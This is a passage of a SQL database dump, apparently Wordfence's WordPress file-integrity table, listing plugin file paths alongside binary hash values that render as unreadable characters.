V','wp-content/plugins/wordfence/lib/menu_tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gԌpPIg[=','V!ޟƚ_z=|yaXȏ','',0,'?'),('!##sw:\rH*$q','wp-content/plugins/wordfence/lib/menu_tools_diagnostic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7<Ճʟ9\nK','ёSvm(6V\nlv','',0,'?'),('!Tۦ	lI\n','wp-content/plugins/wordfence/lib/menu_tools_importExport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$^k>T|','k^XR1, c=\\','',0,'?'),('UI_Ym_','wp-content/plugins/wordfence/lib/menu_tools_livetraffic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ss,(q','kPs_|S}lV{G]0܁t','',0,'?'),('@L߯7٭kقE','wp-content/plugins/wordfence/lib/menu_tools_twoFactor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jlF+>Tm/av~3','Zfk%y,?SCU=lhѕ','',0,'?'),('Cs\\\ns\'m','wp-content/plugins/wordfence/lib/menu_tools_whois.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0JM(]\Z7w','[:QݔqF/qG;N@Kq08ΤO`[','',0,'?'),('7\"妿W\rѽ','wp-content/plugins/wordfence/lib/menu_wordfence_central.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nՆKvOԜ\'\0','^{A荗.Fخ\"m)>T','',0,'?'),('@ȯ&Oo','wp-content/plugins/wordfence/lib/noc1.key',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9eb\0PO','_ujP-KOAܫ','',0,'?'),('kU/^ ','wp-content/plugins/wordfence/lib/rest-api/wfRESTAuthenticationController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d:ǽ	X̩TI','IS:3+̢$i_if:A','',0,'?'),('HC)C','wp-content/plugins/wordfence/lib/rest-api/wfRESTBaseController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yK\nu@x','Aݶ݁;_|sȤ4_)zaKQEe!','',0,'?'),('e-RȉL:','wp-content/plugins/wordfence/lib/rest-api/wfRESTConfigController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-n(֟5> a.\'','j^!yfӳucwWx','',0,'?'),('i/pEt\nl','wp-content/plugins/wordfence/lib/rest-api/wfRESTScanController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5oQ4)dT','Dt3v\Z%jlf%O)&&1L','',0,'?'),('F{A','wp-content/plugins/wordfence/lib/sysinfo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ۍQꅳ9','!D#D\"0zt6IHԆ\\0̈\Zd','',0,'?'),('M~^x;','wp-content/plugins/wordfence/lib/unknownFiles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n✚o\"* b','p}\'5HZ%[*:^^i','',0,'?'),('LR7QToG|{','wp-content/plugins/wordfence/lib/viewFullActivityLog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@lM3JtOF@','[`\\pǣTb>=PivO','',0,'?'),('ٵ\nhJxdvԃ]','wp-content/plugins/wordfence/lib/wf503.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A)+Љ','o+lѥarЙ\nyÂ','',0,'?'),('2]hqu:T6EU','wp-content/plugins/wordfence/lib/wfAPI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Cx3v@Q$)g\r','kBhl%ܟGa=R @Ξ{','',0,'?'),('Ɇ8pŻѵV','wp-content/plugins/wordfence/lib/wfActivityReport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>	[\Z᷎x4','+|\Z#*NθBND]|\0','',0,'?'),('zoܲ~b','wp-content/plugins/wordfence/lib/wfAdminNoticeQueue.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K\r4X.','lvl	](W7+0-','',0,'?'),('Ni~	`WE','wp-content/plugins/wordfence/lib/wfAlerts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']5+6.ZM.','7ɟSYPW	OXxy*ieHY','',0,'?'),('ދ1Fa','wp-content/plugins/wordfence/lib/wfArray.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'Fbaۆₑ1ʤ/','n2q8D-AR>xqYq$ ш','',0,'?'),('-=QCwtnL#','wp-content/plugins/wordfence/lib/wfBrowscap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\re.b','HznO#/tɚ\"U Ai','',0,'?'),('XJp','wp-content/plugins/wordfence/lib/wfBrowscapCache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','TQxj','1YTЈqW6݋h	','',0,'?'),('1]M|KFZ','wp-content/plugins/wordfence/lib/wfBulkCountries.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9	+OyծurO3\n','X&o1\'cgmlySt\r','',0,'?'),('ґ-\r{,','wp-content/plugins/wordfence/lib/wfCache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7 ƿsy','|uIPwh5ڎ.m\"*n_ 9JP','',0,'?'),('hJD㰗G n','wp-content/plugins/wordfence/lib/wfCentralAPI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ăa\\F','!)-5%xi=F$07~\n','',0,'?'),('Z4<n?e','wp-content/plugins/wordfence/lib/wfConfig.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'LKkD','>k\rM)ɱ]jާ2%{/L','',0,'?'),('8ÛZEQ$}UPT','wp-content/plugins/wordfence/lib/wfCrawl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1铇ܙ~\rm','%&9	/DXG؞߇U4','',0,'?'),('ڥ^i$&','wp-content/plugins/wordfence/lib/wfCredentialsController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z\0իw6','76ay5?}%.]؞uS','',0,'?'),('xβЦA	<','wp-content/plugins/wordfence/lib/wfCrypt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CR`9|e','U͊sds9;COȤ@','',0,'?'),('J^\Z7uGk+','wp-content/plugins/wordfence/lib/wfDB.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P_<-1__Iu','%dd_\01@TY$A','',0,'?'),('ikmCxʷ','wp-content/plugins/wordfence/lib/wfDashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&4.','U0@\0\'21k^ͅEi.E','',0,'?'),('7ruF@J,','wp-content/plugins/wordfence/lib/wfDateLocalization.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4K_J2Cmcͭt','Djy,Lwa <U S','',0,'?'),('l9=h,>&','wp-content/plugins/wordfence/lib/wfDiagnostic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0n3','`MTRLl&)hZ/%','',0,'?'),('F\ZC1P','wp-content/plugins/wordfence/lib/wfDict.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y LZ!bEl','.{0Je{5-~[T$Ğ','',0,'?'),('A0ff` Kǁ}','wp-content/plugins/wordfence/lib/wfDirectoryIterator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n+Z/_\Zxuv','u;IVa[~㵭TZ\\^yJj','',0,'?'),('q5@*=&\\X','wp-content/plugins/wordfence/lib/wfHelperBin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';!ȍ4QX#','չ%-^qUqMeY','',0,'?'),('PM\ZI̸ݭY`r','wp-content/plugins/wordfence/lib/wfHelperString.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OVFaDV44ܪ','2-7na5A>cִ\ZNA-p{Qn\Z','',0,'?'),('ikCT,','wp-content/plugins/wordfence/lib/wfIPWhitelist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ϝq,ؾ\\','5%v_E[P3w,=s$bF','',0,'?'),('1ϣI','wp-content/plugins/wordfence/lib/wfImportExportController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HM.','ƌZ>2ì<\rsJ2*','',0,'?'),('jsw2pqS','wp-content/plugins/wordfence/lib/wfIssues.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GAa<ά','9ti?L\rE-,*<a\\=ia','',0,'?'),('(>f0\Zg[|','wp-content/plugins/wordfence/lib/wfJWT.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}{ jNcK','0mhN`xx~HLjsOP,','',0,'?'),('ؠ]fP','wp-content/plugins/wordfence/lib/wfLockedOut.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GOFb\Zxh^b','s`D֐KY2@ckmbE(>2','',0,'?'),('w+\"+$^','wp-content/plugins/wordfence/lib/wfLog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4ޒ	N3G','o[G\n^/;LA^)R','',0,'?'),('\\h RX<C','wp-content/plugins/wordfence/lib/wfMD5BloomFilter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','߅w@LOR','EFjrč;s΀.f:ϤF','',0,'?'),('w:k@DiWQ','wp-content/plugins/wordfence/lib/wfModuleController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oIƷkb','7.ݰ̿UL>\"TM5]>','',0,'?'),('tǱ%F','wp-content/plugins/wordfence/lib/wfNotification.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0Ǎ V2(dhVD','SaYgj+| JM8','',0,'?'),('+3pU','wp-content/plugins/wordfence/lib/wfOnboardingController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y%̍ų<','ŔWF&x\Z	\"gߠ;=Dٗx','',0,'?'),('TоR\'{','wp-content/plugins/wordfence/lib/wfPersistenceController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%kyiMO*','X(30\r\n\nPE̠ 9','',0,'?'),('mqPoD0*L','wp-content/plugins/wordfence/lib/wfRESTAPI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\8H mi+','++Ɵ0͂b=[㜁','',0,'?'),('ތt+\\+XaZU','wp-content/plugins/wordfence/lib/wfScan.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';jڹ%a`','$>3Tp9INO\n$','',0,'?'),('6XԪ4[_=t','wp-content/plugins/wordfence/lib/wfScanEngine.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VfJEtw','gNIq[n678ֆ>\'W\ZN\\X','',0,'?'),('bHzfWgw','wp-content/plugins/wordfence/lib/wfSchema.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O@	|O','gvK%oiS7.]siH2:p','',0,'?'),('K2;<Dkub','wp-content/plugins/wordfence/lib/wfStyle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s1_ek2R','j颎_c6323օ]Gs}.\n','',0,'?'),('sk6/н','wp-content/plugins/wordfence/lib/wfSupportController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uIWԝV','ns=\rT4>Q}ql','',0,'?'),('hLJHX#0','wp-content/plugins/wordfence/lib/wfUnlockMsg.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6]u})e',':%ozN]	&4U','',0,'?'),('e\\1tƋ<	','wp-content/plugins/wordfence/lib/wfUpdateCheck.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4\Z@Xg	kv{t','\Zެ%)I0P?CHk@rMzlH` F','',0,'?'),('Q49LzJ','wp-content/plugins/wordfence/lib/wfUtils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Dgm<\n','LRZIR\\^ӿ#(mc~ 6ڡ','',0,'?'),('@GteY\\\'>O','wp-content/plugins/wordfence/lib/wfVersionCheckController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~\Zyh[*[ǥ','q\rzչ4kÛ>ڌj\'$a9]\n','',0,'?'),('eŐnA','wp-content/plugins/wordfence/lib/wfView.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','⇲*!P\'|%\Z','\0+FoL (\\.w g{&:όH','',0,'?'),('v{Cҧ4I','wp-content/plugins/wordfence/lib/wfViewResult.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9ֿYCA4|p','{30pDr%#Mz_ϔK}Ao6MR','',0,'?'),('ݡ=NxK`*','wp-content/plugins/wordfence/lib/wordfenceClass.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X$\\#XRfۊ','=\07bCGyPŲ[Ut:\Zkh','',0,'?'),('kHm1`0ѹ_','wp-content/plugins/wordfence/lib/wordfenceConstants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%7qčH','D@*uS\\QxO`æs2SMy9','',0,'?'),('X-4J_3','wp-content/plugins/wordfence/lib/wordfenceHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y;U\'a','gJ1kkWx7e}Uulmy.','',0,'?'),('z|*6S\\53','wp-content/plugins/wordfence/lib/wordfenceScanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jMʺR\'iț','(\\ 21&NHU','',0,'?'),('h<]OpNCƴ','wp-content/plugins/wordfence/lib/wordfenceURLHoover.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','͠؄C\ZƽYR%:.','&@bJR%XGhg>q','',0,'?'),('Jl1','wp-content/plugins/wordfence/models/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E\"xK{8dS','C\'r9@Kކtw#@k','',0,'?'),('`&%eFgd','wp-content/plugins/wordfence/models/block/wfBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','znK_','7Y.ڔn!ڒ\Ze','',0,'?'),('j4-O ՄrL\n','wp-content/plugins/wordfence/models/block/wfRateLimit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$1D\'wm','E&&\na~b+\Z)jMpM','',0,'?'),('֔ߚy(qDw','wp-content/plugins/wordfence/models/common/wfGeoIP2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YJs@jrjtm','3ÑѲs\r&z=dspJx3w','',0,'?'),('g]e!^(PK','wp-content/plugins/wordfence/models/common/wfTab.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2T}HW\'<}\\','Z¥|sS8e3Eؗ$ܜ-h','',0,'?'),('X~Vzl!_]/-3','wp-content/plugins/wordfence/models/firewall/wfFirewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2\\fG݉R','b4g챔Fadm)D=@g','',0,'?'),('9XU7z','wp-content/plugins/wordfence/models/page/wfPage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tbo i%HXwXv','ƅ1h/jw<U\\kq%s|W6','',0,'?'),('O܎$8Je','wp-content/plugins/wordfence/models/scanner/wfScanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f(\n4tf','_;ĈS^ɐ\ZY','',0,'?'),(',:3չC@~','wp-content/plugins/wordfence/modules/login-security/classes/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Aabvr','C\'r9@Kކtw#@k','',0,'?'),('@={&}_','wp-content/plugins/wordfence/modules/login-security/classes/controller/ajax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fŴSz','L?T`^]=#|\"/\ZHm:/wH','',0,'?'),('/-TǻT<S','wp-content/plugins/wordfence/modules/login-security/classes/controller/captcha.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-\ruZE:	','^<1t>SM_3k!$','',0,'?'),('\ZO3F5K;@ ','wp-content/plugins/wordfence/modules/login-security/classes/controller/cron.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@q\\}[','[TnEjd($:!hΝ\0s><','',0,'?'),('@qG-$|','wp-content/plugins/wordfence/modules/login-security/classes/controller/db.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gPʋi[','DeJ\Zfxb	x\'P:U','',0,'?'),('p\\*e\n\rψ','wp-content/plugins/wordfence/modules/login-security/classes/controller/notices.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z83?wW','\r.l]\\)	Zqp]_^uJ\n%','',0,'?'),('Vrz(nol*','wp-content/plugins/wordfence/modules/login-security/classes/controller/permissions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y״>UɆ','Ru\Z`\\6ÃMR\r3Z!C|s,P{','',0,'?'),('SCi1ۭj','wp-content/plugins/wordfence/modules/login-security/classes/controller/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p\\E(i','4O+oc.`_U>8','',0,'?'),('{4.##','wp-content/plugins/wordfence/modules/login-security/classes/controller/support.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nʆwqF','R	j[8ح͸WEH̅aI','',0,'?'),('ȁ#/\06','wp-content/plugins/wordfence/modules/login-security/classes/controller/time.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4ӹu;P','aD,ǭ+vFe\"+!1t','',0,'?'),('&	Ytz(\Z','wp-content/plugins/wordfence/modules/login-security/classes/controller/totp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j.\\0*	[','f8\'!RFL˙^w','',0,'?'),('HCTp(^l','wp-content/plugins/wordfence/modules/login-security/classes/controller/users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','٣gR 3','}{cV\"z9NY8JW','',0,'?'),('L\Z|=c','wp-content/plugins/wordfence/modules/login-security/classes/controller/whitelist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B0oǔ','7/QƐՐwg:?#{sɟ','',0,'?'),('S	g	Nd','wp-content/plugins/wordfence/modules/login-security/classes/controller/wordfencels.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y]4x\"Dw^','S5_\'玚ES-1WMLju^]c','',0,'?'),('Wx\ZTa7{','wp-content/plugins/wordfence/modules/login-security/classes/model/asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G|s,=K#','6ly6ɦi3U,E[鲓9','',0,'?'),('o1iL5z$7','wp-content/plugins/wordfence/modules/login-security/classes/model/compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u1\\8;#j-','P|l_Z3z<NɧK','',0,'?'),('%w45X泞','wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/base2n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t^I\']!','Ǧbt5fckdm','',0,'?'),('.7fw9Pm@','wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/jwt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0H#IHD','voVYx?\n\n&3c-\r8m','',0,'?'),('w@IeRf7','wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/symmetric.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hR','=mH/\neC3u58','',0,'?'),('t[[=6u7;YT','wp-content/plugins/wordfence/modules/login-security/classes/model/crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4s[lAc4f','ƺ>y.~yK^)*f6F','',0,'?'),('\rz@_ÐmdM','wp-content/plugins/wordfence/modules/login-security/classes/model/ip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','96f;0','mgc%i\ZnAB@wFz;y`\rN','',0,'?'),('rY\0S(z|','wp-content/plugins/wordfence/modules/login-security/classes/model/notice.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-Gbyf|S','oG5}[`nxܡ^@B#lb','',0,'?'),('cp	PU3/','wp-content/plugins/wordfence/modules/login-security/classes/model/request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&ܮM,~/r','F;W]&z~o\'/q+','',0,'?'),('2p)tI','wp-content/plugins/wordfence/modules/login-security/classes/model/settings/db.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' \0\">y>=','xVQ/}琾:(3&%UJoC','',0,'?'),('ǖd!s<XЯ','wp-content/plugins/wordfence/modules/login-security/classes/model/settings/wpoptions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*1{,˾ʂ','<G$U+kL>\0hahBS-','',0,'?'),('-_mq+1','wp-content/plugins/wordfence/modules/login-security/classes/model/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h㠲ieɡ','IHMp\\Nh\n׈NF=-Z=hO','',0,'?'),('-6Yw@i=','wp-content/plugins/wordfence/modules/login-security/classes/model/text/html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OhO<FҬ','PJHtNsnd*F\'WWaq]','',0,'?'),('H)jHj','wp-content/plugins/wordfence/modules/login-security/classes/model/text/javascript.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V\'BlIf\"c','O$U?\nRyV=TZ','',0,'?'),('g\Z\\\r`=m','wp-content/plugins/wordfence/modules/login-security/classes/model/tokenbucket.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P\rL{ǀ','VZ+&\rЩU;L)R!ӵ','',0,'?'),('U.G\0h7K','wp-content/plugins/wordfence/modules/login-security/classes/model/view/tab.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{ǲ겊T','s׷my([~MNԘ;i','',0,'?'),(';DthEG>H','wp-content/plugins/wordfence/modules/login-security/classes/model/view/title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o\\','Zm$zpuCVgIgIN','',0,'?'),('#:SkU{','wp-content/plugins/wordfence/modules/login-security/classes/model/view.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*:?l]u','2P탚=w=7Ar\nfQ~,B','',0,'?'),('kYyh6ʐIĲ&5','wp-content/plugins/wordfence/modules/login-security/css/admin-global.1592338782.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-SH1@kQұ','^H2m<LAm	NG)Iw:D','',0,'?'),('*e#?\r','wp-content/plugins/wordfence/modules/login-security/css/admin.1592338782.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S%v#)ݩ5!','Bixu\n1܎ͺ2{','',0,'?'),('}.}','wp-content/plugins/wordfence/modules/login-security/css/colorbox.1592338782.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<w\ri컎vL*x','Nb\r̎/?+\'bi\'W$@i\0','',0,'?'),('.[l\Z	q5','wp-content/plugins/wordfence/modules/login-security/css/font-awesome.1592338782.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N2J娳YB瘱','\ZPL㨒ZitA7d','',0,'?'),('PTo\"U)&A','wp-content/plugins/wordfence/modules/login-security/css/ionicons.1592338782.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*ƣٿc;z','NJs@3	:h)7K<\\N+','',0,'?'),('p5pֈgC0','wp-content/plugins/wordfence/modules/login-security/css/jquery-ui-timepicker-addon.1592338782.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AMA@|','u\ZӚ1!b \"0SBȓ>rEk','',0,'?'),('O$l<B4ç,','wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.min.1592338782.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l.(KpQ','ٍ$rb=phxK5]8QRjn4','',0,'?'),('%}ZaD!','wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.structure.min.1592338782.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')/4;$۔ެvi\\','ni뗅NvX7Y]D','',0,'?'),('vIWDN7','wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.theme.min.1592338782.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kXZb5','[\0NEggdq\r*\'I','',0,'?'),('%HN.Nͼ','wp-content/plugins/wordfence/modules/login-security/css/login.1592338782.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m᳀2rmV','rJ]s682!\ZpG','',0,'?'),('ow*\nΛ΢GҜ]','wp-content/plugins/wordfence/modules/login-security/img/header.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p]j-','8#̄(8O\"	+h\"Fb','',0,'?'),('}CwXTC','wp-content/plugins/wordfence/modules/login-security/img/lightbox-controls.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m]a\\$','Ǘh?S):i@h.Xg','',0,'?'),('\\1݃%VE|<N','wp-content/plugins/wordfence/modules/login-security/img/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:m𙗣P','j*edoX~7&N9|L','',0,'?'),('E?tB9bvF`1','wp-content/plugins/wordfence/modules/login-security/img/loading_background.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'2p\nKX','Ύ%XŖF1s;Lzr璻','',0,'?'),('%fW	P0}+','wp-content/plugins/wordfence/modules/login-security/img/menu.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p]j-','8#̄(8O\"	+h\"Fb','',0,'?'),('MzŭY','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_444444_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GJu;QZ6','\\MUKhQwCiVJ\'','',0,'?'),('f rp(p$','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_555555_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pbD@pG+','*DZ>Bg&YY4(</','',0,'?'),('Jլ4\rn','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777620_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J\\c7yxгl','~qV*\'1]3^m','',0,'?'),('s4RX>O','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777777_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h^n=(&݂N&','SDIBz_-?(YpEyƹA','',0,'?'),('H%,','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_cc0000_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|%;wQ8@','wi>6Ƭ4.NC\Z4IO','',0,'?'),('b0݀>j\"G','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_ffffff_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Aa+JD$2J','/#?TiOLyvuTKɤ\\ػ','',0,'?'),('97E\"߬','wp-content/plugins/wordfence/modules/login-security/js/admin-global.1592338782.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LgD5w\'|IGV5','}њ@PF)M$jp{e','',0,'?'),('.)lݚjvRc','wp-content/plugins/wordfence/modules/login-security/js/admin.1592338782.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',Q5\Z*yy!s','J\"qUKa\'1_NXG`揧W>','',0,'?'),('Ai͕','wp-content/plugins/wordfence/modules/login-security/js/jquery-ui-timepicker-addon.1592338782.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','89\"zzVv*]','ۆ%%l:Jf<bqPPt˯}ߝ\"f','',0,'?'),('am*','wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.1592338782.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lYZiਆ3\02[','(A#F~+FghS.b','',0,'?'),('t84\nw\"\nN8e','wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.min.1592338782.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lWeU{9','G8=\0> 3wg3.4','',0,'?'),('[<104{vp','wp-content/plugins/wordfence/modules/login-security/js/jquery.qrcode.min.1592338782.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ԹXp`me<','wP\0pzuYDSz(WߥP3$S','',0,'?'),('}\\ȃjGR','wp-content/plugins/wordfence/modules/login-security/js/jquery.tmpl.min.1592338782.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\}\"7ڷDZ','.IH\Zg\0H!7`gޠZzȄž6|','',0,'?'),('i_Ilċh','wp-content/plugins/wordfence/modules/login-security/js/login.1592338782.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~Vtj:','.y@Ive\Z?gdhO\0','',0,'?'),('dtS0[\\Og:','wp-content/plugins/wordfence/modules/login-security/views/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Aabvr